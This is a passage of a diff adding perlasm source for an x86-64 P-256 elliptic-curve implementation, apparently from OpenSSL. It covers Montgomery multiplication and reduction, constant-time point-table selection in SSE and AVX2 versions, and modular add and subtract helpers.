+	sbb	$poly1, $acc5		# .Lpoly[1]
+	sbb	\$0, $acc0		# .Lpoly[2]
+	 mov	$acc1, $t1
+	sbb	$poly3, $acc1		# .Lpoly[3]
+	sbb	\$0, $acc2
+
+	cmovc	$t2, $acc4
+	cmovc	$t3, $acc5
+	mov	$acc4, 8*0($r_ptr)
+	cmovc	$t0, $acc0
+	mov	$acc5, 8*1($r_ptr)
+	cmovc	$t1, $acc1
+	mov	$acc0, 8*2($r_ptr)
+	mov	$acc1, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_mul_montx,.-__ecp_nistz256_mul_montx
+
+.type	__ecp_nistz256_sqr_montx,\@abi-omnipotent
+.align	32
+__ecp_nistz256_sqr_montx:
+	mulx	$acc6, $acc1, $acc2	# a[0]*a[1]
+	mulx	$acc7, $t0, $acc3	# a[0]*a[2]
+	xor	%eax, %eax
+	adc	$t0, $acc2
+	mulx	$acc0, $t1, $acc4	# a[0]*a[3]
+	 mov	$acc6, %rdx
+	adc	$t1, $acc3
+	adc	\$0, $acc4
+	xor	$acc5, $acc5		# $acc5=0,cf=0,of=0
+
+	#################################
+	mulx	$acc7, $t0, $t1		# a[1]*a[2]
+	adcx	$t0, $acc3
+	adox	$t1, $acc4
+
+	mulx	$acc0, $t0, $t1		# a[1]*a[3]
+	 mov	$acc7, %rdx
+	adcx	$t0, $acc4
+	adox	$t1, $acc5
+	adc	\$0, $acc5
+
+	#################################
+	mulx	$acc0, $t0, $acc6	# a[2]*a[3]
+	 mov	8*0+128($a_ptr), %rdx
+	xor	$acc7, $acc7		# $acc7=0,cf=0,of=0
+	 adcx	$acc1, $acc1		# acc1:6<<1
+	adox	$t0, $acc5
+	 adcx	$acc2, $acc2
+	adox	$acc7, $acc6		# of=0
+
+	mulx	%rdx, $acc0, $t1
+	mov	8*1+128($a_ptr), %rdx
+	 adcx	$acc3, $acc3
+	adox	$t1, $acc1
+	 adcx	$acc4, $acc4
+	mulx	%rdx, $t0, $t4
+	mov	8*2+128($a_ptr), %rdx
+	 adcx	$acc5, $acc5
+	adox	$t0, $acc2
+	 adcx	$acc6, $acc6
+	.byte	0x67
+	mulx	%rdx, $t0, $t1
+	mov	8*3+128($a_ptr), %rdx
+	adox	$t4, $acc3
+	 adcx	$acc7, $acc7
+	adox	$t0, $acc4
+	 mov	\$32, $a_ptr
+	adox	$t1, $acc5
+	.byte	0x67,0x67
+	mulx	%rdx, $t0, $t4
+	 mov	$acc0, %rdx
+	adox	$t0, $acc6
+	 shlx	$a_ptr, $acc0, $t0
+	adox	$t4, $acc7
+	 shrx	$a_ptr, $acc0, $t4
+	 mov	.Lpoly+8*3(%rip), $t1
+
+	# reduction step 1
+	add	$t0, $acc1
+	adc	$t4, $acc2
+
+	mulx	$t1, $t0, $acc0
+	 mov	$acc1, %rdx
+	adc	$t0, $acc3
+	 shlx	$a_ptr, $acc1, $t0
+	adc	\$0, $acc0
+	 shrx	$a_ptr, $acc1, $t4
+
+	# reduction step 2
+	add	$t0, $acc2
+	adc	$t4, $acc3
+
+	mulx	$t1, $t0, $acc1
+	 mov	$acc2, %rdx
+	adc	$t0, $acc0
+	 shlx	$a_ptr, $acc2, $t0
+	adc	\$0, $acc1
+	 shrx	$a_ptr, $acc2, $t4
+
+	# reduction step 3
+	add	$t0, $acc3
+	adc	$t4, $acc0
+
+	mulx	$t1, $t0, $acc2
+	 mov	$acc3, %rdx
+	adc	$t0, $acc1
+	 shlx	$a_ptr, $acc3, $t0
+	adc	\$0, $acc2
+	 shrx	$a_ptr, $acc3, $t4
+
+	# reduction step 4
+	add	$t0, $acc0
+	adc	$t4, $acc1
+
+	mulx	$t1, $t0, $acc3
+	adc	$t0, $acc2
+	adc	\$0, $acc3
+
+	xor	$t3, $t3		# cf=0
+	adc	$acc0, $acc4		# accumulate upper half
+	 mov	.Lpoly+8*1(%rip), $a_ptr
+	adc	$acc1, $acc5
+	 mov	$acc4, $acc0
+	adc	$acc2, $acc6
+	adc	$acc3, $acc7
+	 mov	$acc5, $acc1
+	adc	\$0, $t3
+
+	xor	%eax, %eax		# cf=0
+	sbb	\$-1, $acc4		# .Lpoly[0]
+	 mov	$acc6, $acc2
+	sbb	$a_ptr, $acc5		# .Lpoly[1]
+	sbb	\$0, $acc6		# .Lpoly[2]
+	 mov	$acc7, $acc3
+	sbb	$t1, $acc7		# .Lpoly[3]
+	sbb	\$0, $t3
+
+	cmovc	$acc0, $acc4
+	cmovc	$acc1, $acc5
+	mov	$acc4, 8*0($r_ptr)
+	cmovc	$acc2, $acc6
+	mov	$acc5, 8*1($r_ptr)
+	cmovc	$acc3, $acc7
+	mov	$acc6, 8*2($r_ptr)
+	mov	$acc7, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_sqr_montx,.-__ecp_nistz256_sqr_montx
+___
+}
+}
+{
+my ($r_ptr,$in_ptr)=("%rdi","%rsi");
+my ($acc0,$acc1,$acc2,$acc3)=map("%r$_",(8..11));
+my ($t0,$t1,$t2)=("%rcx","%r12","%r13");
+
+$code.=<<___;
+################################################################################
+# void ecp_nistz256_from_mont(
+#   uint64_t res[4],
+#   uint64_t in[4]);
+# This one performs Montgomery multiplication by 1, so we only need the reduction
+
+.globl	ecp_nistz256_from_mont
+.type	ecp_nistz256_from_mont,\@function,2
+.align	32
+ecp_nistz256_from_mont:
+	push	%r12
+	push	%r13
+
+	mov	8*0($in_ptr), %rax
+	mov	.Lpoly+8*3(%rip), $t2
+	mov	8*1($in_ptr), $acc1
+	mov	8*2($in_ptr), $acc2
+	mov	8*3($in_ptr), $acc3
+	mov	%rax, $acc0
+	mov	.Lpoly+8*1(%rip), $t1
+
+	#########################################
+	# First iteration
+	mov	%rax, $t0
+	shl	\$32, $acc0
+	mulq	$t2
+	shr	\$32, $t0
+	add	$acc0, $acc1
+	adc	$t0, $acc2
+	adc	%rax, $acc3
+	 mov	$acc1, %rax
+	adc	\$0, %rdx
+
+	#########################################
+	# Second iteration
+	mov	$acc1, $t0
+	shl	\$32, $acc1
+	mov	%rdx, $acc0
+	mulq	$t2
+	shr	\$32, $t0
+	add	$acc1, $acc2
+	adc	$t0, $acc3
+	adc	%rax, $acc0
+	 mov	$acc2, %rax
+	adc	\$0, %rdx
+
+	##########################################
+	# Third iteration
+	mov	$acc2, $t0
+	shl	\$32, $acc2
+	mov	%rdx, $acc1
+	mulq	$t2
+	shr	\$32, $t0
+	add	$acc2, $acc3
+	adc	$t0, $acc0
+	adc	%rax, $acc1
+	 mov	$acc3, %rax
+	adc	\$0, %rdx
+
+	###########################################
+	# Last iteration
+	mov	$acc3, $t0
+	shl	\$32, $acc3
+	mov	%rdx, $acc2
+	mulq	$t2
+	shr	\$32, $t0
+	add	$acc3, $acc0
+	adc	$t0, $acc1
+	 mov	$acc0, $t0
+	adc	%rax, $acc2
+	 mov	$acc1, $in_ptr
+	adc	\$0, %rdx
+
+	###########################################
+	# Branch-less conditional subtraction
+	sub	\$-1, $acc0
+	 mov	$acc2, %rax
+	sbb	$t1, $acc1
+	sbb	\$0, $acc2
+	 mov	%rdx, $acc3
+	sbb	$t2, %rdx
+	sbb	$t2, $t2
+
+	cmovnz	$t0, $acc0
+	cmovnz	$in_ptr, $acc1
+	mov	$acc0, 8*0($r_ptr)
+	cmovnz	%rax, $acc2
+	mov	$acc1, 8*1($r_ptr)
+	cmovz	%rdx, $acc3
+	mov	$acc2, 8*2($r_ptr)
+	mov	$acc3, 8*3($r_ptr)
+
+	pop	%r13
+	pop	%r12
+	ret
+.size	ecp_nistz256_from_mont,.-ecp_nistz256_from_mont
+___
+}
+{
+my ($val,$in_t,$index)=$win64?("%rcx","%rdx","%r8d"):("%rdi","%rsi","%edx");
+my ($ONE,$INDEX,$Ra,$Rb,$Rc,$Rd,$Re,$Rf)=map("%xmm$_",(0..7));
+my ($M0,$T0a,$T0b,$T0c,$T0d,$T0e,$T0f,$TMP0)=map("%xmm$_",(8..15));
+my ($M1,$T2a,$T2b,$TMP2,$M2,$T2a,$T2b,$TMP2)=map("%xmm$_",(8..15));
+
+$code.=<<___;
+################################################################################
+# void ecp_nistz256_select_w5(uint64_t *val, uint64_t *in_t, int index);
+.globl	ecp_nistz256_select_w5
+.type	ecp_nistz256_select_w5,\@abi-omnipotent
+.align	32
+ecp_nistz256_select_w5:
+___
+$code.=<<___	if ($avx>1);
+	mov	OPENSSL_ia32cap_P+8(%rip), %eax
+	test	\$`1<<5`, %eax
+	jnz	.Lavx2_select_w5
+___
+$code.=<<___	if ($win64);
+	lea	-0x88(%rsp), %rax
+.LSEH_begin_ecp_nistz256_select_w5:
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax), %rsp
+	.byte	0x0f,0x29,0x70,0xe0		#movaps	%xmm6, -0x20(%rax)
+	.byte	0x0f,0x29,0x78,0xf0		#movaps	%xmm7, -0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x00		#movaps	%xmm8, 0(%rax)
+	.byte	0x44,0x0f,0x29,0x48,0x10	#movaps	%xmm9, 0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x50,0x20	#movaps	%xmm10, 0x20(%rax)
+	.byte	0x44,0x0f,0x29,0x58,0x30	#movaps	%xmm11, 0x30(%rax)
+	.byte	0x44,0x0f,0x29,0x60,0x40	#movaps	%xmm12, 0x40(%rax)
+	.byte	0x44,0x0f,0x29,0x68,0x50	#movaps	%xmm13, 0x50(%rax)
+	.byte	0x44,0x0f,0x29,0x70,0x60	#movaps	%xmm14, 0x60(%rax)
+	.byte	0x44,0x0f,0x29,0x78,0x70	#movaps	%xmm15, 0x70(%rax)
+___
+$code.=<<___;
+	movdqa	.LOne(%rip), $ONE
+	movd	$index, $INDEX
+
+	pxor	$Ra, $Ra
+	pxor	$Rb, $Rb
+	pxor	$Rc, $Rc
+	pxor	$Rd, $Rd
+	pxor	$Re, $Re
+	pxor	$Rf, $Rf
+
+	movdqa	$ONE, $M0
+	pshufd	\$0, $INDEX, $INDEX
+
+	mov	\$16, %rax
+.Lselect_loop_sse_w5:
+
+	movdqa	$M0, $TMP0
+	paddd	$ONE, $M0
+	pcmpeqd $INDEX, $TMP0
+
+	movdqa	16*0($in_t), $T0a
+	movdqa	16*1($in_t), $T0b
+	movdqa	16*2($in_t), $T0c
+	movdqa	16*3($in_t), $T0d
+	movdqa	16*4($in_t), $T0e
+	movdqa	16*5($in_t), $T0f
+	lea 16*6($in_t), $in_t
+
+	pand	$TMP0, $T0a
+	pand	$TMP0, $T0b
+	por	$T0a, $Ra
+	pand	$TMP0, $T0c
+	por	$T0b, $Rb
+	pand	$TMP0, $T0d
+	por	$T0c, $Rc
+	pand	$TMP0, $T0e
+	por	$T0d, $Rd
+	pand	$TMP0, $T0f
+	por	$T0e, $Re
+	por	$T0f, $Rf
+
+	dec	%rax
+	jnz	.Lselect_loop_sse_w5
+
+	movdqu	$Ra, 16*0($val)
+	movdqu	$Rb, 16*1($val)
+	movdqu	$Rc, 16*2($val)
+	movdqu	$Rd, 16*3($val)
+	movdqu	$Re, 16*4($val)
+	movdqu	$Rf, 16*5($val)
+___
+$code.=<<___	if ($win64);
+	movaps	(%rsp), %xmm6
+	movaps	0x10(%rsp), %xmm7
+	movaps	0x20(%rsp), %xmm8
+	movaps	0x30(%rsp), %xmm9
+	movaps	0x40(%rsp), %xmm10
+	movaps	0x50(%rsp), %xmm11
+	movaps	0x60(%rsp), %xmm12
+	movaps	0x70(%rsp), %xmm13
+	movaps	0x80(%rsp), %xmm14
+	movaps	0x90(%rsp), %xmm15
+	lea	0xa8(%rsp), %rsp
+.LSEH_end_ecp_nistz256_select_w5:
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_select_w5,.-ecp_nistz256_select_w5
+
+################################################################################
+# void ecp_nistz256_select_w7(uint64_t *val, uint64_t *in_t, int index);
+.globl	ecp_nistz256_select_w7
+.type	ecp_nistz256_select_w7,\@abi-omnipotent
+.align	32
+ecp_nistz256_select_w7:
+___
+$code.=<<___	if ($avx>1);
+	mov	OPENSSL_ia32cap_P+8(%rip), %eax
+	test	\$`1<<5`, %eax
+	jnz	.Lavx2_select_w7
+___
+$code.=<<___	if ($win64);
+	lea	-0x88(%rsp), %rax
+.LSEH_begin_ecp_nistz256_select_w7:
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax), %rsp
+	.byte	0x0f,0x29,0x70,0xe0		#movaps	%xmm6, -0x20(%rax)
+	.byte	0x0f,0x29,0x78,0xf0		#movaps	%xmm7, -0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x00		#movaps	%xmm8, 0(%rax)
+	.byte	0x44,0x0f,0x29,0x48,0x10	#movaps	%xmm9, 0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x50,0x20	#movaps	%xmm10, 0x20(%rax)
+	.byte	0x44,0x0f,0x29,0x58,0x30	#movaps	%xmm11, 0x30(%rax)
+	.byte	0x44,0x0f,0x29,0x60,0x40	#movaps	%xmm12, 0x40(%rax)
+	.byte	0x44,0x0f,0x29,0x68,0x50	#movaps	%xmm13, 0x50(%rax)
+	.byte	0x44,0x0f,0x29,0x70,0x60	#movaps	%xmm14, 0x60(%rax)
+	.byte	0x44,0x0f,0x29,0x78,0x70	#movaps	%xmm15, 0x70(%rax)
+___
+$code.=<<___;
+	movdqa	.LOne(%rip), $M0
+	movd	$index, $INDEX
+
+	pxor	$Ra, $Ra
+	pxor	$Rb, $Rb
+	pxor	$Rc, $Rc
+	pxor	$Rd, $Rd
+
+	movdqa	$M0, $ONE
+	pshufd	\$0, $INDEX, $INDEX
+	mov	\$64, %rax
+
+.Lselect_loop_sse_w7:
+	movdqa	$M0, $TMP0
+	paddd	$ONE, $M0
+	movdqa	16*0($in_t), $T0a
+	movdqa	16*1($in_t), $T0b
+	pcmpeqd	$INDEX, $TMP0
+	movdqa	16*2($in_t), $T0c
+	movdqa	16*3($in_t), $T0d
+	lea	16*4($in_t), $in_t
+
+	pand	$TMP0, $T0a
+	pand	$TMP0, $T0b
+	por	$T0a, $Ra
+	pand	$TMP0, $T0c
+	por	$T0b, $Rb
+	pand	$TMP0, $T0d
+	por	$T0c, $Rc
+	prefetcht0	255($in_t)
+	por	$T0d, $Rd
+
+	dec	%rax
+	jnz	.Lselect_loop_sse_w7
+
+	movdqu	$Ra, 16*0($val)
+	movdqu	$Rb, 16*1($val)
+	movdqu	$Rc, 16*2($val)
+	movdqu	$Rd, 16*3($val)
+___
+$code.=<<___	if ($win64);
+	movaps	(%rsp), %xmm6
+	movaps	0x10(%rsp), %xmm7
+	movaps	0x20(%rsp), %xmm8
+	movaps	0x30(%rsp), %xmm9
+	movaps	0x40(%rsp), %xmm10
+	movaps	0x50(%rsp), %xmm11
+	movaps	0x60(%rsp), %xmm12
+	movaps	0x70(%rsp), %xmm13
+	movaps	0x80(%rsp), %xmm14
+	movaps	0x90(%rsp), %xmm15
+	lea	0xa8(%rsp), %rsp
+.LSEH_end_ecp_nistz256_select_w7:
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_select_w7,.-ecp_nistz256_select_w7
+___
+}
+if ($avx>1) {
+my ($val,$in_t,$index)=$win64?("%rcx","%rdx","%r8d"):("%rdi","%rsi","%edx");
+my ($TWO,$INDEX,$Ra,$Rb,$Rc)=map("%ymm$_",(0..4));
+my ($M0,$T0a,$T0b,$T0c,$TMP0)=map("%ymm$_",(5..9));
+my ($M1,$T1a,$T1b,$T1c,$TMP1)=map("%ymm$_",(10..14));
+
+$code.=<<___;
+################################################################################
+# void ecp_nistz256_avx2_select_w5(uint64_t *val, uint64_t *in_t, int index);
+.type	ecp_nistz256_avx2_select_w5,\@abi-omnipotent
+.align	32
+ecp_nistz256_avx2_select_w5:
+.Lavx2_select_w5:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-0x88(%rsp), %rax
+.LSEH_begin_ecp_nistz256_avx2_select_w5:
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax), %rsp
+	.byte	0xc5,0xf8,0x29,0x70,0xe0	#vmovaps %xmm6, -0x20(%rax)
+	.byte	0xc5,0xf8,0x29,0x78,0xf0	#vmovaps %xmm7, -0x10(%rax)
+	.byte	0xc5,0x78,0x29,0x40,0x00	#vmovaps %xmm8, 8(%rax)
+	.byte	0xc5,0x78,0x29,0x48,0x10	#vmovaps %xmm9, 0x10(%rax)
+	.byte	0xc5,0x78,0x29,0x50,0x20	#vmovaps %xmm10, 0x20(%rax)
+	.byte	0xc5,0x78,0x29,0x58,0x30	#vmovaps %xmm11, 0x30(%rax)
+	.byte	0xc5,0x78,0x29,0x60,0x40	#vmovaps %xmm12, 0x40(%rax)
+	.byte	0xc5,0x78,0x29,0x68,0x50	#vmovaps %xmm13, 0x50(%rax)
+	.byte	0xc5,0x78,0x29,0x70,0x60	#vmovaps %xmm14, 0x60(%rax)
+	.byte	0xc5,0x78,0x29,0x78,0x70	#vmovaps %xmm15, 0x70(%rax)
+___
+$code.=<<___;
+	vmovdqa	.LTwo(%rip), $TWO
+
+	vpxor	$Ra, $Ra, $Ra
+	vpxor	$Rb, $Rb, $Rb
+	vpxor	$Rc, $Rc, $Rc
+
+	vmovdqa .LOne(%rip), $M0
+	vmovdqa .LTwo(%rip), $M1
+
+	vmovd	$index, %xmm1
+	vpermd	$INDEX, $Ra, $INDEX
+
+	mov	\$8, %rax
+.Lselect_loop_avx2_w5:
+
+	vmovdqa	32*0($in_t), $T0a
+	vmovdqa	32*1($in_t), $T0b
+	vmovdqa	32*2($in_t), $T0c
+
+	vmovdqa	32*3($in_t), $T1a
+	vmovdqa	32*4($in_t), $T1b
+	vmovdqa	32*5($in_t), $T1c
+
+	vpcmpeqd	$INDEX, $M0, $TMP0
+	vpcmpeqd	$INDEX, $M1, $TMP1
+
+	vpaddd	$TWO, $M0, $M0
+	vpaddd	$TWO, $M1, $M1
+	lea	32*6($in_t), $in_t
+
+	vpand	$TMP0, $T0a, $T0a
+	vpand	$TMP0, $T0b, $T0b
+	vpand	$TMP0, $T0c, $T0c
+	vpand	$TMP1, $T1a, $T1a
+	vpand	$TMP1, $T1b, $T1b
+	vpand	$TMP1, $T1c, $T1c
+
+	vpxor	$T0a, $Ra, $Ra
+	vpxor	$T0b, $Rb, $Rb
+	vpxor	$T0c, $Rc, $Rc
+	vpxor	$T1a, $Ra, $Ra
+	vpxor	$T1b, $Rb, $Rb
+	vpxor	$T1c, $Rc, $Rc
+
+	dec %rax
+	jnz .Lselect_loop_avx2_w5
+
+	vmovdqu $Ra, 32*0($val)
+	vmovdqu $Rb, 32*1($val)
+	vmovdqu $Rc, 32*2($val)
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	(%rsp), %xmm6
+	movaps	0x10(%rsp), %xmm7
+	movaps	0x20(%rsp), %xmm8
+	movaps	0x30(%rsp), %xmm9
+	movaps	0x40(%rsp), %xmm10
+	movaps	0x50(%rsp), %xmm11
+	movaps	0x60(%rsp), %xmm12
+	movaps	0x70(%rsp), %xmm13
+	movaps	0x80(%rsp), %xmm14
+	movaps	0x90(%rsp), %xmm15
+	lea	0xa8(%rsp), %rsp
+.LSEH_end_ecp_nistz256_avx2_select_w5:
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_select_w5,.-ecp_nistz256_avx2_select_w5
+___
+}
+if ($avx>1) {
+my ($val,$in_t,$index)=$win64?("%rcx","%rdx","%r8d"):("%rdi","%rsi","%edx");
+my ($THREE,$INDEX,$Ra,$Rb)=map("%ymm$_",(0..3));
+my ($M0,$T0a,$T0b,$TMP0)=map("%ymm$_",(4..7));
+my ($M1,$T1a,$T1b,$TMP1)=map("%ymm$_",(8..11));
+my ($M2,$T2a,$T2b,$TMP2)=map("%ymm$_",(12..15));
+
+$code.=<<___;
+
+################################################################################
+# void ecp_nistz256_avx2_select_w7(uint64_t *val, uint64_t *in_t, int index);
+.globl	ecp_nistz256_avx2_select_w7
+.type	ecp_nistz256_avx2_select_w7,\@abi-omnipotent
+.align	32
+ecp_nistz256_avx2_select_w7:
+.Lavx2_select_w7:
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-0x88(%rsp), %rax
+.LSEH_begin_ecp_nistz256_avx2_select_w7:
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax), %rsp
+	.byte	0xc5,0xf8,0x29,0x70,0xe0	#vmovaps %xmm6, -0x20(%rax)
+	.byte	0xc5,0xf8,0x29,0x78,0xf0	#vmovaps %xmm7, -0x10(%rax)
+	.byte	0xc5,0x78,0x29,0x40,0x00	#vmovaps %xmm8, 8(%rax)
+	.byte	0xc5,0x78,0x29,0x48,0x10	#vmovaps %xmm9, 0x10(%rax)
+	.byte	0xc5,0x78,0x29,0x50,0x20	#vmovaps %xmm10, 0x20(%rax)
+	.byte	0xc5,0x78,0x29,0x58,0x30	#vmovaps %xmm11, 0x30(%rax)
+	.byte	0xc5,0x78,0x29,0x60,0x40	#vmovaps %xmm12, 0x40(%rax)
+	.byte	0xc5,0x78,0x29,0x68,0x50	#vmovaps %xmm13, 0x50(%rax)
+	.byte	0xc5,0x78,0x29,0x70,0x60	#vmovaps %xmm14, 0x60(%rax)
+	.byte	0xc5,0x78,0x29,0x78,0x70	#vmovaps %xmm15, 0x70(%rax)
+___
+$code.=<<___;
+	vmovdqa	.LThree(%rip), $THREE
+
+	vpxor	$Ra, $Ra, $Ra
+	vpxor	$Rb, $Rb, $Rb
+
+	vmovdqa .LOne(%rip), $M0
+	vmovdqa .LTwo(%rip), $M1
+	vmovdqa .LThree(%rip), $M2
+
+	vmovd	$index, %xmm1
+	vpermd	$INDEX, $Ra, $INDEX
+	# Skip index = 0, because it is implicitly the point at infinity
+
+	mov	\$21, %rax
+.Lselect_loop_avx2_w7:
+
+	vmovdqa	32*0($in_t), $T0a
+	vmovdqa	32*1($in_t), $T0b
+
+	vmovdqa	32*2($in_t), $T1a
+	vmovdqa	32*3($in_t), $T1b
+
+	vmovdqa	32*4($in_t), $T2a
+	vmovdqa	32*5($in_t), $T2b
+
+	vpcmpeqd	$INDEX, $M0, $TMP0
+	vpcmpeqd	$INDEX, $M1, $TMP1
+	vpcmpeqd	$INDEX, $M2, $TMP2
+
+	vpaddd	$THREE, $M0, $M0
+	vpaddd	$THREE, $M1, $M1
+	vpaddd	$THREE, $M2, $M2
+	lea	32*6($in_t), $in_t
+
+	vpand	$TMP0, $T0a, $T0a
+	vpand	$TMP0, $T0b, $T0b
+	vpand	$TMP1, $T1a, $T1a
+	vpand	$TMP1, $T1b, $T1b
+	vpand	$TMP2, $T2a, $T2a
+	vpand	$TMP2, $T2b, $T2b
+
+	vpxor	$T0a, $Ra, $Ra
+	vpxor	$T0b, $Rb, $Rb
+	vpxor	$T1a, $Ra, $Ra
+	vpxor	$T1b, $Rb, $Rb
+	vpxor	$T2a, $Ra, $Ra
+	vpxor	$T2b, $Rb, $Rb
+
+	dec %rax
+	jnz .Lselect_loop_avx2_w7
+
+
+	vmovdqa	32*0($in_t), $T0a
+	vmovdqa	32*1($in_t), $T0b
+
+	vpcmpeqd	$INDEX, $M0, $TMP0
+
+	vpand	$TMP0, $T0a, $T0a
+	vpand	$TMP0, $T0b, $T0b
+
+	vpxor	$T0a, $Ra, $Ra
+	vpxor	$T0b, $Rb, $Rb
+
+	vmovdqu $Ra, 32*0($val)
+	vmovdqu $Rb, 32*1($val)
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	movaps	(%rsp), %xmm6
+	movaps	0x10(%rsp), %xmm7
+	movaps	0x20(%rsp), %xmm8
+	movaps	0x30(%rsp), %xmm9
+	movaps	0x40(%rsp), %xmm10
+	movaps	0x50(%rsp), %xmm11
+	movaps	0x60(%rsp), %xmm12
+	movaps	0x70(%rsp), %xmm13
+	movaps	0x80(%rsp), %xmm14
+	movaps	0x90(%rsp), %xmm15
+	lea	0xa8(%rsp), %rsp
+.LSEH_end_ecp_nistz256_avx2_select_w7:
+___
+$code.=<<___;
+	ret
+.size	ecp_nistz256_avx2_select_w7,.-ecp_nistz256_avx2_select_w7
+___
+} else {
+$code.=<<___;
+.globl	ecp_nistz256_avx2_select_w7
+.type	ecp_nistz256_avx2_select_w7,\@function,3
+.align	32
+ecp_nistz256_avx2_select_w7:
+	.byte	0x0f,0x0b	# ud2
+	ret
+.size	ecp_nistz256_avx2_select_w7,.-ecp_nistz256_avx2_select_w7
+___
+}
+{{{
+########################################################################
+# This block implements higher level point_double, point_add and
+# point_add_affine. The key to performance in this case is to allow
+# out-of-order execution logic to overlap computations from next step
+# with tail processing from current step. By using tailored calling
+# sequence we minimize inter-step overhead to give processor better
+# shot at overlapping operations...
+#
+# You will notice that input data is copied to stack. Trouble is that
+# there are no registers to spare for holding original pointers and
+# reloading them, pointers, would create undesired dependencies on
+# effective addresses calculation paths. In other words it's too done
+# to favour out-of-order execution logic.
+#						<appro@openssl.org>
+
+my ($r_ptr,$a_ptr,$b_org,$b_ptr)=("%rdi","%rsi","%rdx","%rbx");
+my ($acc0,$acc1,$acc2,$acc3,$acc4,$acc5,$acc6,$acc7)=map("%r$_",(8..15));
+my ($t0,$t1,$t2,$t3,$t4)=("%rax","%rbp","%rcx",$acc4,$acc4);
+my ($poly1,$poly3)=($acc6,$acc7);
+
+sub load_for_mul () {
+my ($a,$b,$src0) = @_;
+my $bias = $src0 eq "%rax" ? 0 : -128;
+
+"	mov	$b, $src0
+	lea	$b, $b_ptr
+	mov	8*0+$a, $acc1
+	mov	8*1+$a, $acc2
+	lea	$bias+$a, $a_ptr
+	mov	8*2+$a, $acc3
+	mov	8*3+$a, $acc4"
+}
+
+sub load_for_sqr () {
+my ($a,$src0) = @_;
+my $bias = $src0 eq "%rax" ? 0 : -128;
+
+"	mov	8*0+$a, $src0
+	mov	8*1+$a, $acc6
+	lea	$bias+$a, $a_ptr
+	mov	8*2+$a, $acc7
+	mov	8*3+$a, $acc0"
+}
+
+									{
+########################################################################
+# operate in 4-5-0-1 "name space" that matches multiplication output
+#
+my ($a0,$a1,$a2,$a3,$t3,$t4)=($acc4,$acc5,$acc0,$acc1,$acc2,$acc3);
+
+$code.=<<___;
+.type	__ecp_nistz256_add_toq,\@abi-omnipotent
+.align	32
+__ecp_nistz256_add_toq:
+	add	8*0($b_ptr), $a0
+	adc	8*1($b_ptr), $a1
+	 mov	$a0, $t0
+	adc	8*2($b_ptr), $a2
+	adc	8*3($b_ptr), $a3
+	 mov	$a1, $t1
+	sbb	$t4, $t4
+
+	sub	\$-1, $a0
+	 mov	$a2, $t2
+	sbb	$poly1, $a1
+	sbb	\$0, $a2
+	 mov	$a3, $t3
+	sbb	$poly3, $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_add_toq,.-__ecp_nistz256_add_toq
+
+.type	__ecp_nistz256_sub_fromq,\@abi-omnipotent
+.align	32
+__ecp_nistz256_sub_fromq:
+	sub	8*0($b_ptr), $a0
+	sbb	8*1($b_ptr), $a1
+	 mov	$a0, $t0
+	sbb	8*2($b_ptr), $a2
+	sbb	8*3($b_ptr), $a3
+	 mov	$a1, $t1
+	sbb	$t4, $t4
+
+	add	\$-1, $a0
+	 mov	$a2, $t2
+	adc	$poly1, $a1
+	adc	\$0, $a2
+	 mov	$a3, $t3
+	adc	$poly3, $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_sub_fromq,.-__ecp_nistz256_sub_fromq
+
+.type	__ecp_nistz256_subq,\@abi-omnipotent
+.align	32
+__ecp_nistz256_subq:
+	sub	$a0, $t0
+	sbb	$a1, $t1
+	 mov	$t0, $a0
+	sbb	$a2, $t2
+	sbb	$a3, $t3
+	 mov	$t1, $a1
+	sbb	$t4, $t4
+
+	add	\$-1, $t0
+	 mov	$t2, $a2
+	adc	$poly1, $t1
+	adc	\$0, $t2
+	 mov	$t3, $a3
+	adc	$poly3, $t3
+	test	$t4, $t4
+
+	cmovnz	$t0, $a0
+	cmovnz	$t1, $a1
+	cmovnz	$t2, $a2
+	cmovnz	$t3, $a3
+
+	ret
+.size	__ecp_nistz256_subq,.-__ecp_nistz256_subq
+
+.type	__ecp_nistz256_mul_by_2q,\@abi-omnipotent
+.align	32
+__ecp_nistz256_mul_by_2q:
+	add	$a0, $a0		# a0:a3+a0:a3
+	adc	$a1, $a1
+	 mov	$a0, $t0
+	adc	$a2, $a2
+	adc	$a3, $a3
+	 mov	$a1, $t1
+	sbb	$t4, $t4
+
+	sub	\$-1, $a0
+	 mov	$a2, $t2
+	sbb	$poly1, $a1
+	sbb	\$0, $a2
+	 mov	$a3, $t3
+	sbb	$poly3, $a3
+	test	$t4, $t4
+
+	cmovz	$t0, $a0
+	cmovz	$t1, $a1
+	mov	$a0, 8*0($r_ptr)
+	cmovz	$t2, $a2
+	mov	$a1, 8*1($r_ptr)
+	cmovz	$t3, $a3
+	mov	$a2, 8*2($r_ptr)
+	mov	$a3, 8*3($r_ptr)
+
+	ret
+.size	__ecp_nistz256_mul_by_2q,.-__ecp_nistz256_mul_by_2q
+___
+									}
+sub gen_double () {
+    my $x = shift;
+    my ($src0,$sfx,$bias);
